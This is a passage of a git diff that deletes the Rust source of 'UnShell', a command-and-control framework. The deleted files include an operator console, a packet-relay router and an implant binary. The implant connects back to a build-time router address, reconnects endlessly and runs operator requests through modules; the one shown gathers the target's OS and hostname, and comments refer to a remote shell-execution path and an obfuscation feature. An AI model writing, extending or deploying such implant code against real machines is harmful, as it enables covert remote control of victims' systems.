-//! -//! The transport is shared between: -//! - The main thread (sends requests, prints responses). -//! - A background recv thread (receives unsolicited messages from the router, -//! e.g., node-connected notifications — future feature). -//! -//! In v1, the main thread does both send and receive synchronously (blocking -//! recv after each send). The recv thread is reserved for future async notifications. - -use std::sync::atomic::{AtomicU64, Ordering}; -use std::sync::{Arc, Mutex}; - -use rustyline::error::ReadlineError; -use rustyline::DefaultEditor; - -use unshell::protocol::{ - content, HandshakeAck, HandshakeMessage, NodeType, - PacketHeader, PacketType, RequestType, TreeRequest, -}; -use unshell::transport::tcp::TcpTransport; -use unshell::transport::Transport; - -use crate::commands::{self, Command}; -use crate::session::Session; - -// --------------------------------------------------------------------------- -// Request ID counter -// --------------------------------------------------------------------------- - -/// Monotonically increasing request ID generator. -/// -/// Generates unique IDs so the operator can correlate responses to requests -/// in the future when multiple requests are in-flight concurrently. -static REQUEST_COUNTER: AtomicU64 = AtomicU64::new(1); - -fn next_request_id() -> u64 { - REQUEST_COUNTER.fetch_add(1, Ordering::SeqCst) -} - -// --------------------------------------------------------------------------- -// Entry point -// --------------------------------------------------------------------------- - -/// Start the operator REPL, connecting to `router_addr`. -/// -/// Blocks until the user types `exit` or the connection is lost. -/// -/// # Errors -/// -/// Returns an error if the connection or handshake fails. -pub fn run(router_addr: &str) -> Result<(), Box> { - println!("UnShell operator console"); - println!("Connecting to {}...", router_addr); - - let mut transport = TcpTransport::connect(router_addr)?; - let session_id = format!("sess{}", std::process::id()); - let base_path = format!("/operator/{session_id}"); - - // Handshake - let handshake = HandshakeMessage { - node_id: session_id.clone(), - node_type: NodeType::Operator, - registered_paths: vec![base_path.clone()], - platform: "operator".to_owned(), - }; - let handshake_payload = rkyv::to_bytes::(&handshake) - .map_err(|e| format!("failed to serialise handshake: {e}"))?; - let handshake_header = PacketHeader { - dst_path: "/router".to_owned(), - src_path: base_path.clone(), - packet_type: PacketType::Handshake, - }; - transport.send(&handshake_header, &handshake_payload)?; - - let (_, ack_payload) = transport.recv()?; - let ack: HandshakeAck = - rkyv::from_bytes::(&ack_payload) - .map_err(|e| format!("failed to deserialise ack: {e}"))?; - - if !ack.accepted { - return Err(format!( - "router rejected: {}", - ack.rejection_reason.unwrap_or_default() - ) - .into()); - } - - println!("Connected. Type 'help' for commands."); - - // Wrap transport in a Mutex for shared access - let transport = Arc::new(Mutex::new(transport)); - - // REPL state - let mut current_session = Session::new("default", "/"); - let mut background_sessions: Vec = Vec::new(); - - // Readline editor with history - let mut rl = DefaultEditor::new()?; - - loop { - let prompt = if current_session.current_path == "/" { - "unshell> ".to_owned() - } else { - let short = current_session - .current_path - .trim_start_matches("/agents/") - .trim_start_matches("/operator/"); - format!("unshell [{short}]> ") - }; - - let readline = rl.readline(&prompt); - match readline { - Ok(line) => { - rl.add_history_entry(line.as_str()) - .unwrap_or_default(); - - match commands::parse(&line) { - Ok(None) => {} // empty / comment - Ok(Some(cmd)) => { - if !handle_command( - cmd, - &mut current_session, - &mut background_sessions, - &base_path, - &transport, - ) { - break; // exit command - } - } - Err(e) => println!("error: {e}"), - } - } - Err(ReadlineError::Interrupted | ReadlineError::Eof) => { - println!("Disconnecting..."); - break; - } - Err(e) => { - eprintln!("readline error: {e}"); - break; - } - } - } - - println!("Bye."); - Ok(()) -} - -// --------------------------------------------------------------------------- -// Command handlers -// --------------------------------------------------------------------------- - -/// Handle one parsed command. -/// -/// Returns `false` if the REPL should exit, `true` to continue. -fn handle_command( - cmd: Command, - current_session: &mut Session, - background_sessions: &mut Vec, - base_path: &str, - transport: &Arc>, -) -> bool { - match cmd { - Command::Exit => return false, - - Command::Help => commands::print_help(), - - Command::Use(path) => { - // Normalise: if no leading slash, prepend /agents/ - let resolved = if path.starts_with('/') { - path - } else { - format!("/agents/{path}") - }; - current_session.current_path = resolved; - println!("current path: {}", current_session.current_path); - } - - Command::List => { - // Send GetProcedures to /router/nodes - send_request_and_print( - "/router/nodes", - RequestType::GetProcedures, - content::NONE, - None, - base_path, - transport, - ); - } - - Command::Ls(sub_path) => { - let path = sub_path - .as_deref() - .map(|p| current_session.resolve(p)) - .unwrap_or_else(|| current_session.current_path.clone()); - send_request_and_print( - &path, - RequestType::GetProcedures, - content::NONE, - None, - base_path, - transport, - ); - } - - Command::Read(sub_path) => { - let path = current_session.resolve(&sub_path); - send_request_and_print( - &path, - RequestType::Read, - content::NONE, - None, - base_path, - transport, - ); - } - - Command::Call { path, data } => { - let full_path = current_session.resolve(&path); - send_request_and_print( - &full_path, - RequestType::CallProcedure, - content::UTF8_STRING, - data.as_deref(), - base_path, - transport, - ); - } - - Command::Write { path, data } => { - let full_path = current_session.resolve(&path); - send_request_and_print( - &full_path, - RequestType::Write, - content::UTF8_STRING, - Some(&data), - base_path, - transport, - ); - } - - Command::Background => { - let mut session = current_session.clone(); - session.active = false; - background_sessions.push(session); - current_session.current_path = "/".to_owned(); - println!("session backgrounded. Type 'sessions' to list."); - } - - Command::Sessions => { - if background_sessions.is_empty() { - println!("no background sessions"); - } else { - for (i, sess) in background_sessions.iter().enumerate() { - println!(" [{i}] {} ({})", sess.name, sess.current_path); - } - } - } - } - - true -} - -/// Send a `TreeRequest` and print the response. -fn send_request_and_print( - dst_path: &str, - request_type: RequestType, - content_type: &str, - data: Option<&str>, - src_path: &str, - transport: &Arc>, -) { - let request = TreeRequest { - request_id: next_request_id(), - request_type, - content_type: content_type.to_owned(), - data: data.map(|s| s.as_bytes().to_vec()).unwrap_or_default(), - }; - - let Ok(payload) = rkyv::to_bytes::(&request) else { - eprintln!("error: failed to serialise request"); - return; - }; - - let header = PacketHeader { - dst_path: dst_path.to_owned(), - src_path: src_path.to_owned(), - packet_type: PacketType::Request, - }; - - let mut t = transport.lock().expect("transport lock poisoned"); - - if let Err(e) = t.send(&header, &payload) { - eprintln!("send error: {e}"); - return; - } - - match t.recv() { - Ok((_, resp_payload)) => { - match rkyv::from_bytes::( - &resp_payload, - ) { - Ok(resp) => { - if resp.data.is_empty() { - println!("[{:?}]", resp.status); - } else if let Ok(text) = std::str::from_utf8(&resp.data) { - println!("{text}"); - } else { - println!("[{} bytes, content-type: {}]", resp.data.len(), resp.content_type); - } - } - Err(e) => eprintln!("error: failed to deserialise response: {e}"), - } - } - Err(e) => eprintln!("recv error: {e}"), - } -} diff --git a/ush-cli/src/session.rs b/ush-cli/src/session.rs deleted file mode 100644 index e5f0006..0000000 --- a/ush-cli/src/session.rs +++ /dev/null @@ -1,67 +0,0 @@ -//! # Session Management -//! -//! A `Session` represents an active connection context to a specific node path. -//! -//! The operator can have multiple named sessions open simultaneously. Each session -//! has a "current path" (e.g., `/agents/abc123`) that prefixes commands. -//! Sessions can be backgrounded and switched between without disconnecting. -//! -//! ## Session lifecycle -//! -//! ```text -//! connect → handshake → session created -//! ↓ -//! use agents/abc123 ← sets current_path -//! ↓ -//! call shell/exec ← sends to /agents/abc123/shell/exec -//! ↓ -//! background ← pushed to session list, detached -//! ↓ -//! sessions ← lists all active sessions -//! ↓ -//! use ← reattaches -//! ``` - -/// A named, backgroundable session context. -#[derive(Debug, Clone)] -pub struct Session { - /// Human-readable name (e.g., "abc123" or "session-1"). - pub name: String, - /// The current working path (e.g., `/agents/abc123`). - pub current_path: String, - /// Whether this session is in the foreground. - pub active: bool, -} - -impl Session { - /// Create a new session at the given path. - #[must_use] - pub fn new(name: impl Into, path: impl Into) -> Self { - Self { - name: name.into(), - current_path: path.into(), - active: true, - } - } - - /// Return the full path for a sub-path command. - /// - /// If `sub_path` is absolute (starts with `/`), return it unchanged. - /// Otherwise, append it to `current_path`. - /// - /// # Example - /// - /// ```rust - /// let sess = Session::new("abc123", "/agents/abc123"); - /// assert_eq!(sess.resolve("shell/exec"), "/agents/abc123/shell/exec"); - /// assert_eq!(sess.resolve("/router/nodes"), "/router/nodes"); - /// ``` - #[must_use] - pub fn resolve(&self, sub_path: &str) -> String { - if sub_path.starts_with('/') { - sub_path.to_owned() - } else { - format!("{}/{sub_path}", self.current_path.trim_end_matches('/')) - } - } -} diff --git a/ush-payload/Cargo.toml b/ush-payload/Cargo.toml deleted file mode 100644 index 7a00f79..0000000 --- a/ush-payload/Cargo.toml +++ /dev/null @@ -1,35 +0,0 @@ -cargo-features = ["trim-paths"] - -# ============================================================================= -# ush-payload — The UnShell Implant Binary -# ============================================================================= -# -# This binary runs on the target machine. It: -# 1. Connects to the router over TCP (reverse connection). -# 2. Completes the handshake, registering its modules. -# 3. Runs a recv loop, routing incoming TreeRequests to local Endpoints. -# -# Build with: -# cargo build --profile minimize -p ush-payload -# -# The minimize profile strips symbols and optimises for binary size. - -[package] -name = "ush-payload" -version.workspace = true -edition.workspace = true -description = "UnShell implant binary" - -[features] -default = ["log", "tcp"] -log = ["unshell/log"] -log_debug = ["unshell/log_debug"] -tcp = ["unshell/tcp"] -obfuscate = ["unshell/obfuscate_ref"] - -[dependencies] -unshell = { workspace = true } -rkyv = { workspace = true } - -[lints] -workspace = true diff --git a/ush-payload/README.md b/ush-payload/README.md deleted file mode 100644 index fe0ee10..0000000 --- a/ush-payload/README.md +++ /dev/null @@ -1,2 +0,0 @@ -## unshell-payload -Project that contains the code to construct a binary diff --git a/ush-payload/src/main.rs b/ush-payload/src/main.rs deleted file mode 100644 index 470754c..0000000 --- a/ush-payload/src/main.rs +++ /dev/null @@ -1,232 +0,0 @@ -//! # ush-payload — UnShell Implant Binary -//! -//! The payload runs on the target machine. It: -//! -//! 1. Connects to the router over TCP (reverse connection: payload → router). -//! 2. Sends a `HandshakeMessage` to register its modules. -//! 3. Receives a `HandshakeAck`. -//! 4. Enters the recv loop: deserialise `TreeRequest` → dispatch to `Tree` → send `TreeResponse`. -//! -//! ## Building -//! -//! ```text -//! cargo build --profile minimize -p ush-payload -//! ``` -//! -//! The `minimize` profile strips symbols and optimises for binary size. -//! -//! ## Module registration -//! -//! Modules are registered in the `Tree` before the connection loop starts. -//! Each module implements `Endpoint` and is registered at a path prefix. -//! The router will route requests to these paths to this payload. -//! -//! ## Reconnection -//! -//! If the connection to the router drops, the payload waits 5 seconds and -//! reconnects. This loop runs forever. - -mod modules; - -use std::thread; -use std::time::Duration; - -use unshell::protocol::{HandshakeAck, HandshakeMessage, NodeType, PacketHeader, PacketType}; -use unshell::transport::tcp::TcpTransport; -use unshell::transport::Transport; -use unshell::tree::Tree; - -// --------------------------------------------------------------------------- -// Configuration -// Router address and node ID are baked at compile time via environment variables. -// -// Set before building: -// ROUTER_HOST=1.2.3.4 ROUTER_PORT=9000 NODE_ID=abc123 cargo build -p ush-payload -// -// Defaults (for development) point to localhost. -// --------------------------------------------------------------------------- - -/// The router's IP or hostname. Override with ROUTER_HOST env var at build time. -const ROUTER_HOST: &str = match option_env!("ROUTER_HOST") { - Some(h) => h, - None => "127.0.0.1", -}; -/// The router's port. Override with ROUTER_PORT env var at build time. -const ROUTER_PORT: &str = match option_env!("ROUTER_PORT") { - Some(p) => p, - None => "9000", -}; -/// This payload's node ID (base62, unique per implant). -/// Override with NODE_ID env var at build time. -const NODE_ID: &str = match option_env!("NODE_ID") { - Some(id) => id, - None => "devpayload", -}; - -fn main() { - let router_addr = format!("{ROUTER_HOST}:{ROUTER_PORT}"); - - // Build the module tree - let mut tree = build_tree(); - - // Connection loop — reconnects on any error - loop { - match connect_and_run(&router_addr, &mut tree) { - Ok(()) => { - // Clean disconnect — still reconnect - eprintln!("[payload] disconnected, reconnecting in 5s..."); - } - Err(e) => { - eprintln!("[payload] error: {e}, reconnecting in 5s..."); - } - } - thread::sleep(Duration::from_secs(5)); - } -} - -/// Register all modules in the tree. -/// -/// Add new capabilities by registering additional `Endpoint` implementations here. -fn build_tree() -> Tree { - let mut tree = Tree::new(); - tree.register("/info", modules::info::InfoModule); - tree -} - -/// Connect to the router, complete the handshake, and run the recv loop. -/// -/// Returns when the connection is lost or an unrecoverable error occurs. -/// -/// # Errors -/// -/// Returns an error string describing what went wrong. -fn connect_and_run( - router_addr: &str, - tree: &mut Tree, -) -> Result<(), Box> { - eprintln!("[payload] connecting to {router_addr}..."); - let mut transport = TcpTransport::connect(router_addr)?; - eprintln!("[payload] connected"); - - // Build the list of registered paths for the handshake - let base_path = format!("/agents/{NODE_ID}"); - let registered = tree.registered_paths(&base_path); - - // Send handshake - let handshake = HandshakeMessage { - node_id: NODE_ID.to_owned(), - node_type: NodeType::Payload, - registered_paths: registered, - platform: std::env::consts::OS.to_owned(), - }; - let handshake_payload = rkyv::to_bytes::(&handshake) - .map_err(|e| format!("failed to serialise handshake: {e}"))?; - let handshake_header = PacketHeader { - dst_path: "/router".to_owned(), - src_path: base_path.clone(), - packet_type: PacketType::Handshake, - }; - transport.send(&handshake_header, &handshake_payload)?; - eprintln!("[payload] handshake sent"); - - // Receive ack - let (ack_header, ack_payload) = transport.recv()?; - if ack_header.packet_type != PacketType::HandshakeAck { - return Err(format!( - "expected HandshakeAck, got {:?}", - ack_header.packet_type - ) - .into()); - } - let ack: HandshakeAck = - rkyv::from_bytes::(&ack_payload) - .map_err(|e| format!("failed to deserialise HandshakeAck: {e}"))?; - - if !ack.accepted { - return Err(format!( - "router rejected registration: {}", - ack.rejection_reason.unwrap_or_else(|| "no reason given".into()) - ) - .into()); - } - - eprintln!( - "[payload] registered at {}", - ack.assigned_base_path - ); - - // Main recv loop - recv_loop(&mut transport, tree, &base_path) -} - -/// Receive and dispatch `TreeRequest` packets until the connection drops. -/// -/// For each request: -/// 1. Read the packet header and payload. -/// 2. Deserialise the payload as a `TreeRequest`. -/// 3. Strip the base path prefix from the destination path to get the local path. -/// 4. Dispatch to the `Tree`. -/// 5. Serialise the `TreeResponse` and send it back. -/// -/// Returns when a transport error occurs (disconnection, etc.). -fn recv_loop( - transport: &mut TcpTransport, - tree: &mut Tree, - base_path: &str, -) -> Result<(), Box> { - loop { - let (header, payload) = transport.recv()?; - - if header.packet_type != PacketType::Request { - eprintln!("[payload] unexpected packet type: {:?}", header.packet_type); - continue; - } - - // Deserialise the request - let request = - match rkyv::from_bytes::( - &payload, - ) { - Ok(r) => r, - Err(e) => { - eprintln!("[payload] failed to deserialise request: {e}"); - continue; - } - }; - - // Strip the base path to get the local path - let local_path = header - .dst_path - .strip_prefix(base_path) - .unwrap_or(&header.dst_path); - - // Dispatch to the tree - let response = tree.dispatch(request, local_path); - - // Send response - let response_payload = match rkyv::to_bytes::(&response) { - Ok(b) => b, - Err(e) => { - eprintln!("[payload] failed to serialise response: {e}"); - continue; - } - }; - - let response_header = PacketHeader { - dst_path: header.src_path.clone(), - src_path: header.dst_path.clone(), - packet_type: PacketType::Response, - }; - - if let Err(e) = transport.send(&response_header, &response_payload) { - return Err(e.into()); - } - } -} - -// --------------------------------------------------------------------------- -// Default module: /info -// --------------------------------------------------------------------------- - -// Modules live in ush-payload/src/modules/ -// Add new capabilities by creating new files in that directory. diff --git a/ush-payload/src/modules/info.rs b/ush-payload/src/modules/info.rs deleted file mode 100644 index a7828ba..0000000 --- a/ush-payload/src/modules/info.rs +++ /dev/null @@ -1,88 +0,0 @@ -//! # Info Module -//! -//! Provides basic system information about the target at `/info`. -//! -//! ## Supported requests -//! -//! | Path | RequestType | Returns | -//! |---|---|---| -//! | `/info` | `Read` | UTF-8 string: OS name, arch, hostname | -//! | `/info` | `GetProcedures` | List of available procedures | -//! -//! ## Example -//! -//! From the operator CLI: -//! ```text -//! unshell [agents/abc123]> read info -//! linux x86_64 hostname=target-machine -//! ``` - -use unshell::protocol::{ - content, ProcedureDescriptor, RequestType, ResponseStatus, TreeRequest, TreeResponse, -}; -use unshell::tree::Endpoint; - -/// Returns basic system information about the target host. -pub struct InfoModule; - -impl Endpoint for InfoModule { - fn handle(&mut self, request: TreeRequest) -> TreeResponse { - match request.request_type { - RequestType::Read => handle_read(request), - RequestType::GetProcedures => handle_get_procedures(request), - _ => TreeResponse { - request_id: request.request_id, - status: ResponseStatus::UnsupportedOperation, - content_type: content::NONE.to_owned(), - data: Vec::new(), - }, - } - } -} - -/// Return a one-line system summary. -fn handle_read(request: TreeRequest) -> TreeResponse { - let os = std::env::consts::OS; - let arch = std::env::consts::ARCH; - let hostname = hostname(); - let info = format!("os={os} arch={arch} hostname={hostname}"); - TreeResponse { - request_id: request.request_id, - status: ResponseStatus::Ok, - content_type: content::UTF8_STRING.to_owned(), - data: info.into_bytes(), - } -} - -/// Return a list of procedures this module supports. -fn handle_get_procedures(request: TreeRequest) -> TreeResponse { - let procedures = vec![ProcedureDescriptor { - name: "read".to_owned(), - description: "Returns os, arch, and hostname of this target".to_owned(), - }]; - - let Ok(payload) = rkyv::to_bytes::(&procedures) else { - return TreeResponse { - request_id: request.request_id, - status: ResponseStatus::ExecutionError, - content_type: content::NONE.to_owned(), - data: Vec::new(), - }; - }; - - TreeResponse { - request_id: request.request_id, - status: ResponseStatus::Ok, - content_type: content::PROCEDURE_LIST.to_owned(), - data: payload.to_vec(), - } -} - -/// Get the system hostname, or "unknown" if unavailable. -fn hostname() -> String { - // std::net::IpAddr doesn't give us hostname; use /etc/hostname or gethostname - // For now, use a simple approach that doesn't require extra deps. - std::fs::read_to_string("/etc/hostname") - .map(|s| s.trim().to_owned()) - .unwrap_or_else(|_| "unknown".to_owned()) -} diff --git a/ush-payload/src/modules/mod.rs b/ush-payload/src/modules/mod.rs deleted file mode 100644 index 95dc912..0000000 --- a/ush-payload/src/modules/mod.rs +++ /dev/null @@ -1,19 +0,0 @@ -//! # Payload Modules -//! -//! Each file in this directory implements one payload capability. -//! -//! ## Adding a new module -//! -//! 1. Create a new file `modules/mymodule.rs`. -//! 2. Define a struct implementing [`unshell::tree::Endpoint`]. -//! 3. Add `pub mod mymodule;` here. -//! 4. Register it in `main.rs`'s `build_tree()` function: -//! `tree.register("/mymodule", modules::mymodule::MyModule);` -//! -//! ## Module path convention -//! -//! Modules are registered at relative paths (e.g., `/info`, `/shell`). -//! The full path on the network is `{base_path}/{relative_path}`, e.g., -//! `/agents/abc123/info`. - -pub mod info; diff --git a/ush-router/Cargo.toml b/ush-router/Cargo.toml deleted file mode 100644 index 0da1034..0000000 --- a/ush-router/Cargo.toml +++ /dev/null @@ -1,29 +0,0 @@ -# ============================================================================= -# ush-router — The UnShell Router Binary -# ============================================================================= -# -# The router is a dumb packet relay. It: -# 1. Accepts TCP connections from payload nodes and operator nodes. -# 2. Reads the PacketHeader to determine the destination path. -# 3. Forwards the packet to whichever node registered that path prefix. -# 4. Has a small set of built-in endpoints at /router/... for node discovery. -# -# Run with: -# cargo run -p ush-router -- --bind 0.0.0.0:9000 -# -# The router binary is NOT no_std — it uses the full standard library. - -[package] -name = "ush-router" -version.workspace = true -edition.workspace = true -description = "UnShell router/relay binary" - -[dependencies] -unshell = { workspace = true, features = ["tcp", "log"] } -crossbeam-channel = { workspace = true } -thiserror = { workspace = true } -rkyv = { workspace = true } - -[lints] -workspace = true diff --git a/ush-router/src/main.rs b/ush-router/src/main.rs deleted file mode 100644 index fad7c36..0000000 --- a/ush-router/src/main.rs +++ /dev/null @@ -1,42 +0,0 @@ -//! # ush-router — UnShell Router Binary -//! -//! The router accepts TCP connections from all node types (payloads, operators) -//! and routes packets between them based on path-prefix matching. -//! -//! ## Usage -//! -//! ```text -//! ush-router --bind 0.0.0.0:9000 -//! ``` -//! -//! ## Architecture -//! -//! ```text -//! main thread -//! └─ TcpListener loop -//! └─ for each incoming connection: -//! spawn node_thread(TcpStream) -//! -//! node_thread -//! 1. Read HandshakeMessage → register in NodeRegistry -//! 2. Send HandshakeAck -//! 3. recv loop: -//! Read PacketHeader + payload -//! Look up dst_path in NodeRegistry -//! If found: forward raw bytes to that node's channel -//! If not found: send NoBranchError response to src_path -//! 4. On disconnect: remove from NodeRegistry -//! -//! write_thread (per node) -//! Receives bytes from channel → writes to TcpStream -//! ``` - -mod node; -mod registry; -mod router; - -fn main() { - // TODO: parse --bind argument - let bind_addr = "0.0.0.0:9000"; - router::run(bind_addr).expect("router failed"); -} diff --git a/ush-router/src/node.rs b/ush-router/src/node.rs deleted file mode 100644 index fad580f..0000000 --- a/ush-router/src/node.rs +++ /dev/null @@ -1,330 +0,0 @@ -//! # Node Thread -//! -//! Each connected node runs in its own thread. The node thread: -//! -//! 1. Reads a `HandshakeMessage` from the new connection. -//! 2. Registers the node in the `NodeRegistry`. -//! 3. Sends a `HandshakeAck` back. -//! 4. Enters the recv loop: -//! - Read packet (header + payload raw bytes). -//! - Look up `dst_path` in the registry. -//! - If found: forward raw framed bytes to that node's channel. -//! - If not found: send a `NoBranchError` response to the sender. -//! 5. On disconnect: unregister the node and exit. -//! -//! ## Write thread -//! -//! A separate write-thread per node reads from the channel and writes to -//! the `TcpStream`. This decouples the recv loop from potentially slow sends -//! (e.g., a slow operator connection should not block a payload recv loop). -//! -//! ```text -//! node_thread (recv) -//! reads from TcpStream -//! forwards to registry-lookup → channel -//! -//! write_thread -//! reads from channel -//! writes to TcpStream -//! ``` - -use std::net::TcpStream; -use std::sync::{Arc, Mutex}; -use std::time::{SystemTime, UNIX_EPOCH}; -use std::thread; - -use crossbeam_channel::{unbounded, Receiver, Sender}; -use unshell::protocol::{ - HandshakeAck, HandshakeMessage, - PacketHeader, PacketType, ResponseStatus, TreeResponse, - content, -}; -use unshell::transport::tcp::TcpTransport; -use unshell::transport::Transport; - -use crate::registry::{NodeEntry, NodeRegistry}; - -/// Time allowed for the connecting node to send its `HandshakeMessage`. -const HANDSHAKE_TIMEOUT: std::time::Duration = std::time::Duration::from_secs(10); - -// --------------------------------------------------------------------------- -// Public entry point -// --------------------------------------------------------------------------- - -/// Spawn a node thread (and its associated write-thread) for a new connection. -/// -/// # Arguments -/// -/// * `stream` — the accepted TCP stream for this node. -/// * `registry` — shared node registry (wrapped in `Arc`). -pub fn spawn_node(stream: TcpStream, registry: Arc>) { - thread::spawn(move || { - // Set the handshake timeout on the stream. - if let Err(e) = stream.set_read_timeout(Some(HANDSHAKE_TIMEOUT)) { - eprintln!("[router] failed to set handshake timeout: {e}"); - return; - } - - let mut transport = TcpTransport::from_stream(stream); - - // --- Handshake --- - let handshake = match receive_handshake(&mut transport) { - Ok(hs) => hs, - Err(e) => { - eprintln!("[router] handshake failed: {e}"); - return; - } - }; - - let node_id = handshake.node_id.clone(); - eprintln!( - "[router] node connected: id={} type={:?} paths={:?}", - node_id, handshake.node_type, handshake.registered_paths - ); - - // Check for duplicate node_id - { - let reg = registry.lock().expect("registry lock poisoned"); - if reg.node_list().iter().any(|n| n.node_id == node_id) { - let ack = HandshakeAck { - accepted: false, - assigned_base_path: String::new(), - rejection_reason: Some("duplicate_node_id".into()), - }; - let _ = send_handshake_ack(&mut transport, &node_id, &ack); - return; - } - } - - // Create a channel for the write-thread - let (tx, rx): (Sender>, Receiver>) = unbounded(); - - // Register the node - let assigned_path = handshake - .registered_paths - .first() - .cloned() - .unwrap_or_else(|| format!("/{}", node_id)); - - let connected_at = SystemTime::now() - .duration_since(UNIX_EPOCH) - .map(|d| d.as_secs()) - .unwrap_or(0); - - { - let mut reg = registry.lock().expect("registry lock poisoned"); - reg.register(NodeEntry { - node_id: node_id.clone(), - node_type: handshake.node_type, - registered_paths: handshake.registered_paths, - connected_at, - tx, - }); - } - - // Send ack - let ack = HandshakeAck { - accepted: true, - assigned_base_path: assigned_path, - rejection_reason: None, - }; - if let Err(e) = send_handshake_ack(&mut transport, &node_id, &ack) { - eprintln!("[router] failed to send ack to {node_id}: {e}"); - let mut reg = registry.lock().expect("registry lock poisoned"); - reg.unregister(&node_id); - return; - } - - // Remove the read timeout for the main recv loop - if let Err(e) = transport.stream_ref().set_read_timeout(None) { - eprintln!("[router] failed to clear read timeout: {e}"); - } - - // Spawn the write-thread - // Clone the stream via try_clone so the write-thread has its own handle. - let write_stream = match transport.stream_ref().try_clone() { - Ok(s) => s, - Err(e) => { - eprintln!("[router] failed to clone stream for write-thread: {e}"); - let mut reg = registry.lock().expect("registry lock poisoned"); - reg.unregister(&node_id); - return; - } - }; - let write_node_id = node_id.clone(); - thread::spawn(move || { - write_loop(write_stream, rx, &write_node_id); - }); - - // --- Main recv loop --- - recv_loop(&mut transport, &node_id, ®istry); - - // Cleanup - eprintln!("[router] node disconnected: {node_id}"); - let mut reg = registry.lock().expect("registry lock poisoned"); - reg.unregister(&node_id); - }); -} - -// --------------------------------------------------------------------------- -// Recv loop -// --------------------------------------------------------------------------- - -/// Read packets from this node and route them to the appropriate destination. -fn recv_loop( - transport: &mut TcpTransport, - source_node_id: &str, - registry: &Arc>, -) { - loop { - let (header, payload) = match transport.recv() { - Ok(p) => p, - Err(e) => { - eprintln!("[router] recv error from {source_node_id}: {e}"); - break; - } - }; - - // Build the raw framed bytes to forward - let raw = match encode_raw_packet(&header, &payload) { - Some(b) => b, - None => { - eprintln!("[router] failed to re-encode packet from {source_node_id}"); - continue; - } - }; - - // Look up destination - let route_result = { - let reg = registry.lock().expect("registry lock poisoned"); - reg.find_route(&header.dst_path).map(|tx| tx.clone()) - }; - - match route_result { - Some(tx) => { - if tx.send(raw).is_err() { - // Destination's write-thread has exited — the node - // probably disconnected. Send a NoBranchError back. - eprintln!( - "[router] destination channel dead for path {}", - header.dst_path - ); - send_no_branch_error(transport, source_node_id, &header); - } - } - None => { - eprintln!( - "[router] no route for path {} (from {})", - header.dst_path, source_node_id - ); - send_no_branch_error(transport, source_node_id, &header); - } - } - } -} - -// --------------------------------------------------------------------------- -// Write loop -// --------------------------------------------------------------------------- - -/// Receive bytes from the channel and write them to the node's `TcpStream`. -/// -/// Runs in a dedicated thread per node. Exits when the channel is disconnected -/// (which happens when the node is unregistered from the registry). -fn write_loop(mut stream: TcpStream, rx: Receiver>, node_id: &str) { - use std::io::Write; - for bytes in &rx { - if let Err(e) = stream.write_all(&bytes) { - eprintln!("[router] write error to {node_id}: {e}"); - break; - } - } -} - -// --------------------------------------------------------------------------- -// Helpers -// --------------------------------------------------------------------------- - -/// Read and deserialise the `HandshakeMessage` from a new connection. -fn receive_handshake( - transport: &mut TcpTransport, -) -> Result> { - let (header, payload) = transport.recv()?; - - if header.packet_type != PacketType::Handshake { - return Err(format!( - "expected Handshake packet, got {:?}", - header.packet_type - ) - .into()); - } - - let msg: HandshakeMessage = rkyv::from_bytes::(&payload) - .map_err(|e| format!("failed to deserialise HandshakeMessage: {e}"))?; - - Ok(msg) -} - -/// Serialise and send a `HandshakeAck`. -fn send_handshake_ack( - transport: &mut TcpTransport, - source_path: &str, - ack: &HandshakeAck, -) -> Result<(), Box> { - let header = PacketHeader { - dst_path: source_path.to_owned(), - src_path: "/router".to_owned(), - packet_type: PacketType::HandshakeAck, - }; - let payload = rkyv::to_bytes::(ack) - .map_err(|e| format!("failed to serialise HandshakeAck: {e}"))?; - transport.send(&header, &payload)?; - Ok(()) -} - -/// Send a `NoBranchError` response back to the sender of a request. -fn send_no_branch_error( - transport: &mut TcpTransport, - source_node_id: &str, - original_header: &PacketHeader, -) { - // We need the request_id to build the response, but we haven't deserialised - // the payload. Build a response with request_id = 0 as a best-effort. - // The operator CLI should handle this gracefully. - let response = TreeResponse { - request_id: 0, - status: ResponseStatus::NoBranchError, - content_type: content::NONE.to_owned(), - data: Vec::new(), - }; - - let Ok(payload) = rkyv::to_bytes::(&response) else { - return; - }; - - let header = PacketHeader { - dst_path: original_header.src_path.clone(), - src_path: "/router".to_owned(), - packet_type: PacketType::Response, - }; - - if let Err(e) = transport.send(&header, &payload) { - eprintln!("[router] failed to send NoBranchError to {source_node_id}: {e}"); - } -} - -/// Re-encode a decoded packet into raw framed bytes for forwarding. -/// -/// This rebuilds the frame so the write-thread can send it verbatim. -fn encode_raw_packet(header: &PacketHeader, payload: &[u8]) -> Option> { - let header_bytes = unshell::transport::encode_header(header)?; - let header_len = header_bytes.len() as u32; - let payload_len = payload.len() as u32; - - let mut frame = Vec::with_capacity(8 + header_bytes.len() + payload.len()); - frame.extend_from_slice(&header_len.to_be_bytes()); - frame.extend_from_slice(&header_bytes); - frame.extend_from_slice(&payload_len.to_be_bytes()); - frame.extend_from_slice(payload); - Some(frame) -} diff --git a/ush-router/src/registry.rs b/ush-router/src/registry.rs deleted file mode 100644 index 6edcc6a..0000000 --- a/ush-router/src/registry.rs +++ /dev/null @@ -1,258 +0,0 @@ -//! # Node Registry -//! -//! The `NodeRegistry` tracks all connected nodes: their IDs, path prefixes, -//! and the channels used to send packets to them. -//! -//! ## Path routing -//! -//! When the router receives a packet, it calls [`NodeRegistry::find_route`] -//! to find the node that owns the destination path. The routing algorithm -//! uses **longest-prefix matching**: among all registered nodes whose path -//! is a prefix of the destination, the one with the most components wins. -//! -//! ## Thread safety -//! -//! `NodeRegistry` is wrapped in a `Mutex` by the router. All access is -//! serialised through that lock. - -use std::collections::HashMap; - -use crossbeam_channel::Sender; -use unshell::protocol::NodeType; - -// --------------------------------------------------------------------------- -// NodeEntry -// --------------------------------------------------------------------------- - -/// All metadata about a connected node, plus the channel to send it packets. -/// -/// When the router wants to forward a packet to a node, it: -/// 1. Looks up the `NodeEntry` by path prefix. -/// 2. Sends the raw framed bytes through `tx`. -/// -/// The node's write-thread reads from the other end of the channel and -/// writes to the actual `TcpStream`. -pub struct NodeEntry { - /// Unique identifier for this node. - pub node_id: String, - - /// Whether this is a payload or an operator session. - pub node_type: NodeType, - - /// The path prefixes this node owns (e.g., `["/agents/abc123"]`). - /// - /// Stored as strings so we can do prefix matching against arbitrary paths. - pub registered_paths: Vec, - - /// Unix timestamp (seconds since epoch) when this node registered. - pub connected_at: u64, - - /// Channel sender for forwarding raw framed bytes to this node's write-thread. - pub tx: Sender>, -} - -// --------------------------------------------------------------------------- -// NodeRegistry -// --------------------------------------------------------------------------- - -/// A thread-safe registry of all connected nodes. -/// -/// Access is serialised through a `Mutex` in the 